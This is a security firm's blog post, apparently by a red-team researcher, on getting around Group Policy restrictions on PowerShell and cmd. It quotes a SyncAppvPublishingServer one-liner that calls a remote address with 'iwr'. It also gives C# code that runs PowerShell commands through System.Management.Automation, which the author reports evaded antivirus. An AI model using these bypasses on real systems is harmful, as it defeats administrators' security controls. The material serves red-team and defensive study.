• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Threat Advisory – CVE-2022-3155 – Mozilla Thunderbird Vulnerability
September 23, 2022
Rewterz Threat Alert – STOP/DJVU Ransomware – Active IOCs
September 23, 2022

How I bypassed Local Group Policy and Domain Group Policy (Powershell Restrictions)

September 23, 2022

This blog has been written by our Senior Security Researcher, S. Nayani

Introduction

Red teamers are continuously challenging protocols, policies, plans, and procedures. Thinking like an attacker and developing new techniques for infiltration comes with the job description. And this inadvertently also secures the environment. 

While developing techniques for red teaming we thought about an environment where there is no PowerShell or cmd available. During a discussion with a colleague, we wanted to explore a way in which this could be done. Here’s what I came up with.

It has always intrigued me how we can perform red teaming in an environment where there’s no PowerShell or cmd available. During a discussion with other pentesters, we wanted to explore a way in which this could be done. Here’s what I came up with:

First things first let’s disable PowerShell as well as cmd: 

Go to the start button and type edit group policy

Then go to User configuration -> Administrative Templates -> System -> Prevent Access to the Command prompt

And for Powershell: 

User configuration -> Administrative Templates -> System -> Don’t run specified Windows applications and add powershell.exe 

Let’s verify whether cmd and Powershell are restricted or not: 

Work Around From The Internet

We started working on a solution and we found a few different ways to do this, which are mentioned below:

Using Powershdll: 

https://github.com/p3nt4/PowerShdll

Using SyncAppvPublishingServer:

SyncAppvPublishingServer.vbs "echo ''; iwr http://192.168.11.21:4446"

 

 There are a few more programs that can help in using PowerShell without powershell.exe, I won’t go over all the programs, here is a really awesome blog covering a few of the programs: 

https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628

My Own Solution

There were two problems with the above programs, first was that most of the programs mentioned above were being caught by the AntiVirus and in an enterprise environment that could cost you the whole activity, the second was that I was not actually satisfied, I wanted something different, something other than this. I wanted to build my own solution, so I started researching PowerShell and how it actually initializes. I came across this Microsoft documentation and it had the answer for me. 

The System.Management.Automation.dll has the PowerShell class and anyone can initialize the PowerShell class directly from the DLL and execute commands using any programming language. I decided to test this out using C#. Using visual studio code, I will demonstrate a simple program that will execute the PowerShell command even when Local Group Policy restricts it. 

I wrote a small program that will execute whoami and hostname commands:

using System;

using System.Management.Automation;

using System.Collections.ObjectModel;

namespace Testing

{

    class Program

    {

        static void Main(string[] args)

        {

        PowerShell ps = PowerShell.Create();   

        string command;           

        Collection<PSObject> PSOutput;       

        command = "whoami; hostname";

        PSOutput = ps.AddScript(command).Invoke(); 

        for (int i=0; i<PSOutput.Count; i++)

        {

        Console.WriteLine(PSOutput[i].ToString()); 

        } 

                Console.ReadLine(); 

        }

    }

} 

What the above program is doing is that it first initializes Powershell, and I have hard-coded the command which is “whoami” and “hostname,” after that it will Invoke the command and save it in the PSOutput array and the for loop will display the array values. Compile the program with csc.exe and execute the program: 

csc.exe /reference:"C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll" powershell.cs /out:test.exe

After compiling we will have the exe file, executing the exe file will give us the command output: 

And there we have it, we executed a PowerShell command without PowerShell and thus bypassed the Local Group Policy. There are a lot of different techniques that could also be used, for example, we can rename powershell.exe to something else and it will run, or you can simply use a C2 agent to execute the commands. 

From the programs mentioned earlier, some of them were detected by the AV, as far as this solution is concerned. I have scanned this program and at the time of writing, it was not detected by the AV products. This solution is also applicable to the Active Directory environment (Domain Group Policy).

We can tweak the code a little to take inputs and execute the commands:

using System;

using System.Management.Automation;

using System.Collections.ObjectModel;

namespace Testing

{

    class Program

    {

        static void Main(string[] args)

        {

        PowerShell ps = PowerShell.Create();    

        string command;            

        Collection<PSObject> PSOutput;        

        while (true)

        {

        command = Console.ReadLine();

        PSOutput = ps.AddScript(command).Invoke();  

        if (command == "exit")

        {

            break;

        }

        for (int i=0; i<PSOutput.Count; i++)

        {

        Console.WriteLine(PSOutput[i].ToString());  

        }    

        }

        Console.ReadLine();

        }

    }

}  

It’s a very simple and dirty solution but it can get the job done.

  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.